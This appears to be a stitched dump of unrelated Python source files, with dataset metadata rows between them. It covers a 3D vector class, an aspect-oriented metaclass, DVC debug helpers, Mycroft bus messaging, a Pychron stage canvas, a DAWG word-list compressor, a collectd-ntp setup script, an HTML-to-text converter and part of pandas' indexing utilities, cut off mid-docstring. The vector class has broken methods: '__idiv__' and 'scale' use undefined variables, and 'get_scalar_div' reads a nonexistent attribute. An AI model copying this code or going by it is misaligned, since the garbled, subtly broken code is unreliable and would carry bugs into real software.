def __imul__(self, rhs):
"""Multiply this vector by another vector, or a scalar
(single number).
rhs -- Vector, sequence or single value.
"""
v = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
v[0] *= ox
v[1] *= oy
v[2] *= oz
else:
v[0] *= rhs
v[1] *= rhs
v[2] *= rhs
return self
def __rmul__(self, lhs):
x, y, z = self._v
if hasattr(lhs, "__getitem__"):
ox, oy, oz = lhs
return self.from_floats(x*ox, y*oy, z*oz)
else:
return self.from_floats(x*lhs, y*lhs, z*lhs)
def __div__(self, rhs):
"""Return the result of dividing this vector by another vector, or a scalar (single number)."""
x, y, z = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
return self.from_floats(x/ox, y/oy, z/oz)
else:
return self.from_floats(x/rhs, y/rhs, z/rhs)
def __idiv__(self, rhs):
"""Divide this vector by another vector, or a scalar (single number)."""
v = self._v
if hasattr(rhs, "__getitem__"):
v[0] /= ox
v[1] /= oy
v[2] /= oz
else:
v[0] /= rhs
v[1] /= rhs
v[2] /= rhs
return self
def __rdiv__(self, lhs):
x, y, z = self._v
if hasattr(lhs, "__getitem__"):
ox, oy, oz = lhs
return self.from_floats(ox/x, oy/y, oz/z)
else:
return self.from_floats(lhs/x, lhs/y, lhs/z)
def scalar_div(self, scalar):
v = self._v
v[0] /= scalar
v[1] /= scalar
v[2] /= scalar
def vector_div(self, vector):
x, y, z = vector
v= self._v
v[0] /= x
v[1] /= y
v[2] /= z
def get_scalar_div(self, scalar):
x, y, z = self.scalar
return self.from_floats(x / scalar, y / scalar, z / scalar)
def get_vector_div(self, vector):
x, y, z = self._v
xx, yy, zz = vector
return self.from_floats(x / xx, y / yy, z / zz)
def __neg__(self):
"""Returns the negation of this vector (a vector pointing in the opposite direction.
eg v1 = Vector(1,2,3)
print -v1
>>> (-1,-2,-3)
"""
x, y, z = self._v
return self.from_floats(-x, -y, -z)
def __pos__(self):
return self.copy()
def __nonzero__(self):
x, y, z = self._v
return x and y and z
def __call__(self, keys):
"""Returns a tuple of the values in a vector
keys -- An iterable containing the keys (x, y or z)
eg v = Vector3(1.0, 2.0, 3.0)
v('zyx') -> (3.0, 2.0, 1.0)
"""
ord_x = ord('x')
v = self._v
return tuple( v[ord(c)-ord_x] for c in keys )
def as_tuple(self):
"""Returns a tuple of the x, y, z components. A little quicker than
tuple(vector)."""
return tuple(self._v)
def scale(self, scale):
"""Scales the vector by onther vector or a scalar. Same as the
*= operator.
scale -- Value to scale the vector by
"""
v = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
v[0] *= ox
v[1] *= oy
v[2] *= oz
else:
v[0] *= rhs
v[1] *= rhs
v[2] *= rhs
return self
def get_length(self):
"""Calculates the length of the vector."""
x, y, z = self._v
return sqrt(x*x + y*y +z*z)
get_magnitude = get_length
def set_length(self, new_length):
"""Sets the length of the vector. (Normalises it then scales it)
new_length -- The new length of the vector.
"""
v = self._v
try:
x, y, z = v
l = new_length / sqrt(x*x + y*y + z*z)
except ZeroDivisionError:
v[0] = 0.0
v[1] = 0.0
v[2] = 0.0
return self
v[0] = x*l
v[1] = y*l
v[2] = z*l
return self
def get_distance_to(self, p):
"""Returns the distance of this vector to a point.
p -- A position as a vector, or collection of 3 values.
"""
ax, ay, az = self._v
bx, by, bz = p
dx = ax-bx
dy = ay-by
dz = az-bz
return sqrt( dx*dx + dy*dy + dz*dz )
def get_distance_to_squared(self, p):
"""Returns the squared distance of this vector to a point.
p -- A position as a vector, or collection of 3 values.
"""
ax, ay, az = self._v
bx, by, bz = p
dx = ax-bx
dy = ay-by
dz = az-bz
return dx*dx + dy*dy + dz*dz
def normalise(self):
"""Scales the vector to be length 1."""
v = self._v
x, y, z = v
l = sqrt(x*x + y*y + z*z)
try:
v[0] /= l
v[1] /= l
v[2] /= l
except ZeroDivisionError:
v[0] = 0.0
v[1] = 0.0
v[2] = 0.0
return self
normalize = normalise
def get_normalised(self):
x, y, z = self._v
l = sqrt(x*x + y*y + z*z)
return self.from_floats(x/l, y/l, z/l)
get_normalized = get_normalised
def in_sphere(self, sphere):
"""Returns true if this vector (treated as a position) is contained in
the given sphere.
"""
return distance3d(sphere.position, self) <= sphere.radius
def dot(self, other):
"""Returns the dot product of this vector with another.
other -- A vector or tuple
"""
x, y, z = self._v
ox, oy, oz = other
return x*ox + y*oy + z*oz
def cross(self, other):
"""Returns the cross product of this vector with another.
other -- A vector or tuple
"""
x, y, z = self._v
bx, by, bz = other
return self.from_floats( y*bz - by*z,
z*bx - bz*x,
x*by - bx*y )
def cross_tuple(self, other):
"""Returns the cross product of this vector with another, as a tuple.
This avoids the Vector3 construction if you don't need it.
other -- A vector or tuple
"""
x, y, z = self._v
bx, by, bz = other
return ( y*bz - by*z,
z*bx - bz*x,
x*by - bx*y )
def distance3d_squared(p1, p2):
x, y, z = p1
xx, yy, zz = p2
dx = x - xx
dy = y - yy
dz = z - zz
return dx*dx + dy*dy +dz*dz
def distance3d(p1, p2):
x, y, z = p1
xx, yy, zz = p2
dx = x - xx
dy = y - yy
dz = z - zz
return sqrt(dx*dx + dy*dy +dz*dz)
def centre_point3d(points):
return sum( Vector3(p) for p in points ) / len(points)
if __name__ == "__main__":
v1 = Vector3(2.2323, 3.43242, 1.)
print 3*v1
print (2, 4, 6)*v1
print (1, 2, 3)+v1
print v1('xxxyyyzzz')
print v1[2]
print v1.z
v1[2]=5.
print v1
v2= Vector3(1.2, 5, 10)
print v2
v1 += v2
print v1.get_length()
print repr(v1)
print v1[1]
p1 = Vector3(1,2,3)
print p1
print repr(p1)
for v in p1:
print v
#print p1[6]
ptest = Vector3( [1,2,3] )
print ptest
z = Vector3()
print z
file("test.txt", "w").write( "\n".join(str(float(n)) for n in range(20)) )
f = file("test.txt")
v1 = Vector3.from_iter( f )
v2 = Vector3.from_iter( f )
v3 = Vector3.from_iter( f )
print v1, v2, v3
print "--"
print v1
print v1 + (10,20,30)
print v1('xz')
print -v1
#print tuple(ptest)
#p1.set( (4, 5, 6) )
#print p1
print Vector3(10,10,30)+v1
|
mit
| -5,893,449,000,307,266,000 | 23.576923 | 117 | 0.408233 | false | 3.65716 | false | false | false |
andresriancho/python-aop
|
aop/aspecttype.py
|
1
|
1966
|
# -*- coding: utf-8 -*-
"""
python-aop is part of LemonFramework.
python-aop is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
python-aop is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with python-aop. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) 2013 Vicente Ruiz <[email protected]>
"""
class AspectType(type):
"""Metaclase para la construcción de aspectos. Añade el método ``pointcut``
a la clase, de forma que permite vincular un advise a un joinpoint."""
def __new__(mcs, name, bases, classdict):
# Preparamos una función que se encarga de realizar el pointcut para
# cualquier método ó atributo de la clase
def pointcut(cls, joinpoint, advise_class, **kwargs):
# Se prepara el punto donde se ejecutará el aspecto
joinpoint_attr = getattr(cls, joinpoint)
# Se obtienen parámetros adicionales para el aspecto
advise_args = () if not 'args' in kwargs else tuple(kwargs['args'])
advise_kwargs = {} if not 'kwargs' in kwargs else dict(kwargs['kwargs'])
# Se crea el advise
advise = advise_class(joinpoint_attr, *advise_args, **advise_kwargs)
# Preparamos un wrapper
def wrapper(self, *args, **kwargs):
return advise(self, *args, **kwargs)
setattr(cls, joinpoint, wrapper)
# Añadimos el método ``pointcut`` a la clase
classdict['pointcut'] = classmethod(pointcut)
return type.__new__(mcs, name, bases, classdict)
|
gpl-3.0
| -6,336,378,035,457,480,000 | 44.488372 | 84 | 0.676892 | false | 3.549909 | false | false | false |
efiop/dvc
|
dvc/_debug.py
|
1
|
2310
|
from contextlib import ExitStack, contextmanager
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from argparse import Namespace
@contextmanager
def instrument(html_output=False):
"""Run a statistical profiler"""
try:
from pyinstrument import Profiler # pylint: disable=import-error
except ImportError:
print("Failed to run profiler, pyinstrument is not installed")
yield
return
profiler = Profiler()
profiler.start()
yield
profiler.stop()
if html_output:
profiler.open_in_browser()
return
print(profiler.output_text(unicode=True, color=True))
@contextmanager
def profile(dump_path: str = None):
"""Run a cprofile"""
import cProfile
prof = cProfile.Profile()
prof.enable()
yield
prof.disable()
if not dump_path:
prof.print_stats(sort="cumtime")
return
prof.dump_stats(dump_path)
@contextmanager
def debug():
try:
yield
except Exception: # pylint: disable=broad-except
try:
import ipdb as pdb # noqa: T100, pylint: disable=import-error
except ImportError:
import pdb # noqa: T100
pdb.post_mortem()
raise # prevent from jumping ahead
@contextmanager
def debugtools(args: "Namespace" = None, **kwargs):
kw = vars(args) if args else {}
kw.update(kwargs)
with ExitStack() as stack:
if kw.get("pdb"):
stack.enter_context(debug())
if kw.get("cprofile") or kw.get("cprofile_dump"):
stack.enter_context(profile(kw.get("cprofile_dump")))
if kw.get("instrument") or kw.get("instrument_open"):
stack.enter_context(instrument(kw.get("instrument_open", False)))
yield
def add_debugging_flags(parser):
from argparse import SUPPRESS
parser.add_argument(
"--cprofile", action="store_true", default=False, help=SUPPRESS
)
parser.add_argument("--cprofile-dump", help=SUPPRESS)
parser.add_argument(
"--pdb", action="store_true", default=False, help=SUPPRESS
)
parser.add_argument(
"--instrument", action="store_true", default=False, help=SUPPRESS
)
parser.add_argument(
"--instrument-open", action="store_true", default=False, help=SUPPRESS
)
|
apache-2.0
| 1,679,155,082,171,922,400 | 24.384615 | 78 | 0.634632 | false | 3.975904 | false | false | false |
JarbasAI/JarbasAI
|
mycroft/messagebus/api.py
|
1
|
2458
|
from mycroft.messagebus.message import Message
import time
__author__ = "jarbas"
class BusQuery():
def __init__(self, emitter, message_type, message_data=None,
message_context=None):
self.emitter = emitter
self.waiting = False
self.response = Message(None, None, None)
self.query_type = message_type
self.query_data = message_data
self.query_context = message_context
def _end_wait(self, message):
self.response = message
self.waiting = False
def _wait_response(self, timeout):
start = time.time()
elapsed = 0
self.waiting = True
while self.waiting and elapsed < timeout:
elapsed = time.time() - start
time.sleep(0.1)
self.waiting = False
def send(self, response_type=None, timeout=10):
self.response = Message(None, None, None)
if response_type is None:
response_type = self.query_type + ".reply"
self.add_response_type(response_type)
self.emitter.emit(
Message(self.query_type, self.query_data, self.query_context))
self._wait_response(timeout)
return self.response.data
def add_response_type(self, response_type):
self.emitter.once(response_type, self._end_wait)
def get_response_type(self):
return self.response.type
def get_response_data(self):
return self.response.data
def get_response_context(self):
return self.response.context
class BusResponder():
def __init__(self, emitter, response_type, response_data=None,
response_context=None, trigger_messages=None):
self.emitter = emitter
self.response_type = response_type
self.response_data = response_data
self.response_context = response_context
if trigger_messages is None:
trigger_messages = []
for message_type in trigger_messages:
self.listen(message_type)
def listen(self, message_type):
self.emitter.on(message_type, self.respond)
def update_response(self, data=None, context=None):
if data is not None:
self.response_data = data
if context is not None:
self.response_context = context
def respond(self, message):
self.emitter.emit(Message(self.response_type, self.response_data,
self.response_context))
|
gpl-3.0
| 1,356,580,934,561,058,300 | 31.342105 | 74 | 0.617168 | false | 4.009788 | false | false | false |
USGSDenverPychron/pychron
|
pychron/canvas/canvas2D/stage_canvas.py
|
1
|
5114
|
# ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Instance, Tuple, Color, Bool, Any, Float, Property
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.canvas.canvas2D.crosshairs_overlay import CrosshairsOverlay, SimpleCrosshairsOverlay
from pychron.canvas.canvas2D.map_canvas import MapCanvas
DIRECTIONS = {'Left': ('x', -1), 'Right': ('x', 1),
'Down': ('y', -1), 'Up': ('y', 1)}
class StageCanvas(MapCanvas):
crosshairs_overlay = Instance(SimpleCrosshairsOverlay)
crosshairs_color = Color('black')
stage_position = Property(depends_on='_stage_position')
_stage_position = Tuple(Float, Float)
desired_position = Property(depends_on='_desired_position')
_desired_position = Any
show_current_position = Bool(True)
current_position = Property(depends_on='cur_pos')
cur_pos = Tuple(Float(0), Float(0))
show_desired_position = Bool(True)
desired_position_color = Color('green')
def get_stage_screen_position(self):
return self.map_screen([self._stage_position])[0]
def get_stage_position(self):
return self._stage_position
def set_stage_position(self, x, y):
"""
"""
if x is not None and y is not None:
self._stage_position = (x, y)
self.invalidate_and_redraw()
def clear_desired_position(self):
self._desired_position = None
self.request_redraw()
def set_desired_position(self, x, y):
"""
"""
self._desired_position = (x, y)
self.request_redraw()
# ===============================================================================
# interactor
# ===============================================================================
def normal_mouse_move(self, event):
"""
"""
self.cur_pos = (event.x, event.y)
if self.valid_position(event.x, event.y):
event.window.set_pointer(self.cross_pointer)
else:
event.window.set_pointer(self.normal_pointer)
event.handled = True
# self.request_redraw()
def normal_mouse_enter(self, event):
"""
"""
event.window.set_pointer(self.cross_pointer)
event.handled = True
def normal_mouse_leave(self, event):
"""
"""
event.window.set_pointer(self.normal_pointer)
self.request_redraw()
event.handled = True
def normal_key_pressed(self, event):
c = event.character
if c in ('Left', 'Right', 'Up', 'Down'):
ax_key, direction = DIRECTIONS[c]
direction = self._calc_relative_move_direction(c, direction)
distance = 5 if event.shift_down else 1
self.stage_manager.relative_move(ax_key, direction, distance)
event.handled = True
elif c in ('a', 'A'):
self.stage_manager.accept_point()
def key_released(self, char):
"""
called from outside by StageCompnentEditor
"""
self.stage_manager.key_released()
# ===============================================================================
# private
# ===============================================================================
def _calc_relative_move_direction(self, char, direction):
return direction
def _add_crosshairs(self, klass=None):
if klass is None:
klass = CrosshairsOverlay
ch = klass(component=self)
self.crosshairs_overlay = ch
self.overlays.append(ch)
# ===============================================================================
# property get/set
# ===============================================================================
def _get_current_position(self):
md = self.map_data(self.cur_pos)
return self.cur_pos[0], md[0], self.cur_pos[1], md[1]
def _get_stage_position(self):
"""
"""
return self.map_screen([self._stage_position])[0]
def _get_desired_position(self):
"""
"""
if self._desired_position is not None:
x, y = self.map_screen([self._desired_position])[0]
return x, y
# ============= EOF =============================================
|
apache-2.0
| 5,148,437,984,851,985,000 | 33.554054 | 97 | 0.51447 | false | 4.333898 | false | false | false |
AndrasKovacs/dawg-gen
|
dawg_gen.py
|
1
|
7469
|
#!/usr/bin/env python
import os
import array as ar
import hashlib
from sys import argv
from copy import copy
from collections import defaultdict
from time import clock
######################## Read/check word list ###############################
print
if len(argv) != 2:
print "Usage: dawg_gen.py [word list path]"
exit(1)
filename = argv[1]
time = clock()
print "Checking word list...",
try:
wordlist = open(filename).read().split()
except IOError:
print "File not found."
exit(1)
if not all(all(c.isupper() for c in w) for w in wordlist) or any(b < a for a,b in zip(wordlist, wordlist[1:])):
print
print "Invalid word list; please include alphabetically sorted uppercase words delimited by space or newline."
exit(1)
print "OK".ljust(13),
print "finished in {:.4} seconds.".format(clock()-time)
######################## Build Trie #########################################
class SeqTrie(object):
def __init__(self, init = tuple(), is_end = False, val = "", end_of_list = False):
self.children = []
self.is_end = is_end
self.val = val
self.end_of_list = end_of_list
for x in init:
self.add(x)
def add(self, word):
for c in word:
if not self.children or self.children[-1].val != c: #only works on pre-sorted word lists!
self.children.append(SeqTrie())
self = self.children[-1]
self.val = c
self.is_end = True
def __iter__(self):
for x in self.children:
for y in x.__iter__():
yield y
yield self
t = clock()
print "Building trie...".ljust(35),
trie = SeqTrie(wordlist)
print "finished in {:.4} seconds.".format(clock()-t)
################### Generate hashes/merge nodes, ###########################
t = clock()
print "Merging redundant nodes...".ljust(35),
node_dict = {}
for x in trie:
hash_str = "".join((str(x.is_end), x.val, "".join(y.hash for y in x.children)))
x.hash = hashlib.md5(hash_str).digest()
if x.hash not in node_dict:
node_dict[x.hash] = x
for i,y in enumerate(x.children):
x.children[i] = node_dict[y.hash]
x.children = tuple(sorted(x.children))
clist_dict = {x.children: x.children for x in node_dict.itervalues()}
for x in node_dict.itervalues():
x.children = clist_dict[x.children]
print "finished in {:.4} seconds.".format(clock()-t)
########################## Merge child lists ###############################
t = clock()
print "Merging child lists...".ljust(35),
inverse_dict = defaultdict(list)
compress_dict = {x:[x] for x in clist_dict.itervalues() if x}
for clist in clist_dict.itervalues():
for node in clist:
inverse_dict[node].append(clist)
for x in inverse_dict:
inverse_dict[x].sort( key = lambda x: (len(x), sum(len(inverse_dict[y]) for y in x) ))
for clist in sorted(compress_dict.keys(), key = lambda x:(len(x), -1*sum(len(inverse_dict[y]) for y in x)), reverse=True):
for other in min((inverse_dict[x] for x in clist), key = len):
if compress_dict[other] and set(clist) < set(compress_dict[other][-1]):
compress_dict[other].append(clist)
compress_dict[clist] = False
break
compress_dict = {x:l for x,l in compress_dict.iteritems() if l}
print "finished in {:.4} seconds.".format(clock()-t)
#################### Create compressed trie structure #######################
t = clock()
print "Creating compressed node array...".ljust(35),
end_node = SeqTrie(init = (), is_end = False, val = "", end_of_list = True)
end_node.children = ()
array = [0,]*(sum(len(x[0]) for x in compress_dict.itervalues()) + 1)
clist_indices = {}
array[0] = end_node
clist_indices[()] = 0
pos = 1
for stuff in compress_dict.itervalues():
if len(stuff) > 1:
sort = [0]*26
for i, clist in enumerate(stuff):
for y in clist:
sort[ord(y.val) - ord('A')] = (i, y)
stuff.append([n for i,n in sorted(x for x in sort if x)])
for clist in stuff[:-1]:
clist_indices[clist] = pos + len(stuff[0]) - len(clist)
else:
clist_indices[stuff[0]] = pos
clist = stuff[-1]
array[pos:pos+len(clist)] = map(copy, clist)
pos += len(clist)
array[pos-1].end_of_list = True
for x in array:
x.children = clist_indices[x.children]
root = clist_indices[trie.children]
root_node = SeqTrie(init = (), is_end = False, val = "", end_of_list = True)
root_node.children = root
array.append(root_node)
print "finished in {:.4} seconds.".format(clock()-t)
######################### check trie ###################################
t = clock()
print "Checking output correctness...",
def extract_words(array, i=root, carry = ""):
node = array[i]
if not node.val:
return
while True:
for x in extract_words(array, node.children, carry + node.val):
yield x
if node.is_end:
yield carry + node.val
if node.end_of_list: break
i += 1
node = array[i]
if set(extract_words(array)) == set(wordlist):
print "OK".ljust(4), "finished in {:.4} seconds.".format(clock()-t)
else:
print "INVALID OUTPUT: trie does not match original word list."
exit(1)
print
print "Compression finished in {:.4} seconds.".format(clock()-time)
print "Number of nodes:", len(array)
print
################## export as bitpacked array binaries #########################
def prompt_filename():
while True:
inp = raw_input("Enter export path: ")
if os.path.exists(inp):
while True:
choice = raw_input("File already exists. Overwrite? ")
if choice in ('y', 'Y'): return inp
if choice in ('n', 'N'): break
else:
return inp
def prompt_packing_mode():
ok_3b = len(array) <= 2**17
ok_4b = len(array) <= 2**22
while True:
print
print "Choose node size:"
print " (3) bytes" + " -> UNAVAILABLE: number of nodes above 2**17-1 or 131071"*(not ok_3b)
print " (4) bytes" + " -> UNAVAILABLE: number of nodes above 2**22-1 or 4194303"*(not ok_4b)
print
mode = raw_input("> ")
if mode in ok_3b*"3" + ok_4b*"4":
return mode
inp = prompt_filename()
mode = prompt_packing_mode()
t = clock()
print
print "Exporting as bit-packed array...",
if mode == "4":
output = ar.array('L', [0]*len(array))
for i,x in enumerate(array):
output[i] |= (x.children << 10)
output[i] |= ((ord(x.val) if x.val else 0) << 2)
output[i] |= (x.end_of_list<<1)
output[i] |= (x.is_end)
outfile = open(inp, "wb")
output.tofile(outfile)
outfile.close()
print "finished in {:.4} seconds.".format(clock()-t)
elif mode == "3":
output = ar.array('B', [0]*(len(array)*3))
for i,x in enumerate(array):
i *= 3
a, b, c = i, i+1, i+2
output[a] = (x.children & 0b00000000011111111)
output[b] = (x.children & 0b01111111100000000) >> 8
output[c] = (x.children & 0b10000000000000000) >> 9
output[c] |= ((ord(x.val) - ord('A') + 1 if x.val else 0) << 2) # 0 is reserved for root and end-of-trie nodes
output[c] |= (x.end_of_list<<1)
output[c] |= (x.is_end)
outfile = open(inp, "wb")
output.tofile(outfile)
outfile.close()
print "finished in {:.4} seconds.".format(clock()-t)
|
mit
| -984,014,338,422,908,400 | 28.405512 | 122 | 0.560718 | false | 3.283077 | false | false | false |
ministryofjustice/collectd-ntp
|
setup.py
|
1
|
1397
|
import os
from setuptools import setup
def pkg_dir(path):
return os.path.join(os.path.dirname(__file__), path)
with open(pkg_dir('VERSION'), 'r') as f:
version = f.read().strip()
with open(pkg_dir('README.rst'), 'r') as f:
readme = f.read()
setup(
name='collectd-ntp',
version=version,
py_modules=['ntpoffset'],
install_requires=['ntplib>=0.3.3,<1', 'dnspython>=1.12.0,<2'],
author='Andy Driver',
author_email='[email protected]',
maintainer='MOJDS',
url='https://github.com/ministryofjustice/collectd-ntp',
description='NTP offsets plugin for collectd',
long_description=readme,
license='LICENSE',
keywords=['python', 'ministryofjustice', 'collectd', 'ntp'],
test_suite='tests',
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Development Status :: 3 - Alpha',
'Environment :: Plugins',
'Intended Audience :: Developers',
'Natural Language :: English',
'Topic :: Internet',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Monitoring',
'Topic :: System :: Networking :: Monitoring',
'Topic :: System :: Networking :: Time Synchronization']
)
|
mit
| 2,740,606,144,956,291,000 | 30.044444 | 71 | 0.614173 | false | 3.775676 | false | false | false |
idiles/opendict
|
lib/extra/html2text.py
|
1
|
4084
|
"""
html2text.py
convert an html doc to text
"""
# system libraries
import os, sys, string, time, getopt
import re
WIDTH = 80
def tag_replace (data,center,indent, use_ansi = 0):
data = re.sub ("\s+", " ", data)
data = re.sub ("(?s)<!--.*?-->", "", data)
data = string.replace (data, "\n", " ")
output = []
# modified 6/17/99 splits on all cases of "img" tags
# imgs = re.split ("(?s)(<img.*?>)", data)
imgs = re.split ("(?si)(<img.*?>)", data)
for img in imgs:
if string.lower(img[:4]) == "<img":
alt = re.search ("(?si)alt\s*=\s*\"([^\"]*)\"", img)
if not alt:
alt = re.search ("(?si)alt\s*=([^\s]*)", img)
if alt:
output.append ("%s" % img[alt.start(1):alt.end(1)])
else:
output.append ("[img]")
else:
output.append (img)
data = string.join (output, "")
data = re.sub ("(?i)<br>", "\n", data)
data = re.sub ("(?i)<hr[^>]*>", "\n" + "-"*50 + "\n", data)
data = re.sub ("(?i)<li>", "\n* ", data)
if use_ansi:
data = re.sub ("(?i)<h[0-9]>", "\n[32m", data)
else:
data = re.sub ("(?i)<h[0-9]>", "\n", data)
if use_ansi:
data = re.sub ("(?i)</h[0-9]>", "[0m\n", data)
else:
data = re.sub ("(?i)</h[0-9]>", "\n", data)
data = re.sub ("(?i)<ul>", "\n<UL>\n", data)
data = re.sub ("(?i)</ul>", "\n</UL>\n", data)
data = re.sub ("(?i)<center>", "\n<CENTER>\n", data)
data = re.sub ("(?i)</center>", "\n</CENTER>\n", data)
data = re.sub ("(?i)</div>", "\n", data)
if use_ansi:
data = re.sub ("(?i)<b>", "[1m", data)
data = re.sub ("(?i)</b>", "[0m", data)
data = re.sub ("(?i)<i>", "[2m", data)
data = re.sub ("(?i)</i>", "[0m", data)
data = re.sub ("(?i)<title>", "\n<CENTER>\n[31m", data)
data = re.sub ("(?i)</title>", "[0m\n</CENTER>\n", data)
else:
data = re.sub ("(?i)<title>", "\n<CENTER>\n", data)
data = re.sub ("(?i)</title>", "\n</CENTER>\n", data)
data = re.sub ("(?i)<p>", "\n", data)
data = re.sub ("(?i)<tr[^>]*>", "\n", data)
data = re.sub ("(?i)</table>", "\n", data)
data = re.sub ("(?i)<td[^>]*>", "\t", data)
data = re.sub ("(?i)<th[^>]*>", "\t", data)
data = re.sub (" *\n", "\n", data)
lines = string.split (data, "\n")
output = []
for line in lines:
if line == "<UL>":
indent = indent + 1
elif line == "</UL>":
indent = indent - 1
if indent < 0: indent = 0
elif line == "<CENTER>":
center = center + 1
elif line == "</CENTER>":
center = center - 1
if center < 0: center = 0
else:
if center:
line = " "*indent + string.strip(line)
nline = re.sub("\[.*?m", "", line)
nline = re.sub ("<[^>]*>", "", nline)
c = WIDTH/2 - (len (nline) / 2)
output.append (" "*c + line)
else:
output.append (" "*indent + line)
data = string.join (output, "\n")
data = re.sub (" *\n", "\n", data)
data = re.sub ("\n\n\n*", "\n\n", data)
data = re.sub ("<[^>]*>", "", data)
return (data, center, indent)
def html2text (data, use_ansi = 0, is_latin1 = 0):
pre = re.split("(?s)(<pre>[^<]*</pre>)", data)
out = []
indent = 0
center = 0
for part in pre:
if part[:5] != "<pre>":
(res, center, indent) = tag_replace (part,center,indent, use_ansi)
out.append (res)
else:
part = re.sub("(?i)</*pre>", "", part)
out.append (part)
data = string.join (out)
data = re.sub (">", ">", data)
data = re.sub ("<", "<", data)
data = re.sub (" ", " ", data)
return data
def usage(progname):
print "usage: %s --help <htmlfile>" % progname
print __doc__
def main(argc, argv):
progname = argv[0]
alist, args = getopt.getopt(argv[1:], "", ["help"])
for (field, val) in alist:
if field == "--help":
usage(progname)
return
if len(args):
file = args[0]
else:
return
progname = argv[0]
fp = open (file)
data = fp.read()
fp.close()
if data:
print (html2text(data))
else:
print "Document contained no data"
if __name__ == "__main__":
main(len(sys.argv), sys.argv)
|
gpl-2.0
| 3,743,144,919,791,192,600 | 26.594595 | 72 | 0.481636 | false | 2.765064 | false | false | false |
rs2/pandas
|
pandas/core/indexers.py
|
1
|
14164
|
"""
Low-dependency indexing utilities.
"""
import warnings
import numpy as np
from pandas._typing import Any, AnyArrayLike
from pandas.core.dtypes.common import (
is_array_like,
is_bool_dtype,
is_extension_array_dtype,
is_integer,
is_integer_dtype,
is_list_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCSeries
# -----------------------------------------------------------
# Indexer Identification
def is_valid_positional_slice(slc: slice) -> bool:
"""
Check if a slice object can be interpreted as a positional indexer.
Parameters
----------
slc : slice
Returns
-------
bool
Notes
-----
A valid positional slice may also be interpreted as a label-based slice
depending on the index being sliced.
"""
def is_int_or_none(val):
return val is None or is_integer(val)
return (
is_int_or_none(slc.start)
and is_int_or_none(slc.stop)
and is_int_or_none(slc.step)
)
def is_list_like_indexer(key) -> bool:
"""
Check if we have a list-like indexer that is *not* a NamedTuple.
Parameters
----------
key : object
Returns
-------
bool
"""
# allow a list_like, but exclude NamedTuples which can be indexers
return is_list_like(key) and not (isinstance(key, tuple) and type(key) is not tuple)
def is_scalar_indexer(indexer, ndim: int) -> bool:
"""
Return True if we are all scalar indexers.
Parameters
----------
indexer : object
ndim : int
Number of dimensions in the object being indexed.
Returns
-------
bool
"""
if isinstance(indexer, tuple):
if len(indexer) == ndim:
return all(
is_integer(x) or (isinstance(x, np.ndarray) and x.ndim == len(x) == 1)
for x in indexer
)
return False
def is_empty_indexer(indexer, arr_value: np.ndarray) -> bool:
"""
Check if we have an empty indexer.
Parameters
----------
indexer : object
arr_value : np.ndarray
Returns
-------
bool
"""
if is_list_like(indexer) and not len(indexer):
return True
if arr_value.ndim == 1:
if not isinstance(indexer, tuple):
indexer = tuple([indexer])
return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
return False
# -----------------------------------------------------------
# Indexer Validation
def check_setitem_lengths(indexer, value, values) -> bool:
"""
Validate that value and indexer are the same length.
An special-case is allowed for when the indexer is a boolean array
and the number of true values equals the length of ``value``. In
this case, no exception is raised.
Parameters
----------
indexer : sequence
Key for the setitem.
value : array-like
Value for the setitem.
values : array-like
Values being set into.
Returns
-------
bool
Whether this is an empty listlike setting which is a no-op.
Raises
------
ValueError
When the indexer is an ndarray or list and the lengths don't match.
"""
no_op = False
if isinstance(indexer, (np.ndarray, list)):
# We can ignore other listlikes because they are either
# a) not necessarily 1-D indexers, e.g. tuple
# b) boolean indexers e.g. BoolArray
if is_list_like(value):
if len(indexer) != len(value):
# boolean with truth values == len of the value is ok too
if not (
isinstance(indexer, np.ndarray)
and indexer.dtype == np.bool_
and len(indexer[indexer]) == len(value)
):
raise ValueError(
"cannot set using a list-like indexer "
"with a different length than the value"
)
if not len(indexer):
no_op = True
elif isinstance(indexer, slice):
if is_list_like(value):
if len(value) != length_of_indexer(indexer, values):
raise ValueError(
"cannot set using a slice indexer with a "
"different length than the value"
)
if not len(value):
no_op = True
return no_op
def validate_indices(indices: np.ndarray, n: int) -> None:
"""
Perform bounds-checking for an indexer.
-1 is allowed for indicating missing values.
Parameters
----------
indices : ndarray
n : int
Length of the array being indexed.
Raises
------
ValueError
Examples
--------
>>> validate_indices([1, 2], 3)
# OK
>>> validate_indices([1, -2], 3)
ValueError
>>> validate_indices([1, 2, 3], 3)
IndexError
>>> validate_indices([-1, -1], 0)
# OK
>>> validate_indices([0, 1], 0)
IndexError
"""
if len(indices):
min_idx = indices.min()
if min_idx < -1:
msg = f"'indices' contains values less than allowed ({min_idx} < -1)"
raise ValueError(msg)
max_idx = indices.max()
if max_idx >= n:
raise IndexError("indices are out-of-bounds")
# -----------------------------------------------------------
# Indexer Conversion
def maybe_convert_indices(indices, n: int):
"""
Attempt to convert indices into valid, positive indices.
If we have negative indices, translate to positive here.
If we have indices that are out-of-bounds, raise an IndexError.
Parameters
----------
indices : array-like
Array of indices that we are to convert.
n : int
Number of elements in the array that we are indexing.
Returns
-------
array-like
An array-like of positive indices that correspond to the ones
that were passed in initially to this function.
Raises
------
IndexError
One of the converted indices either exceeded the number of,
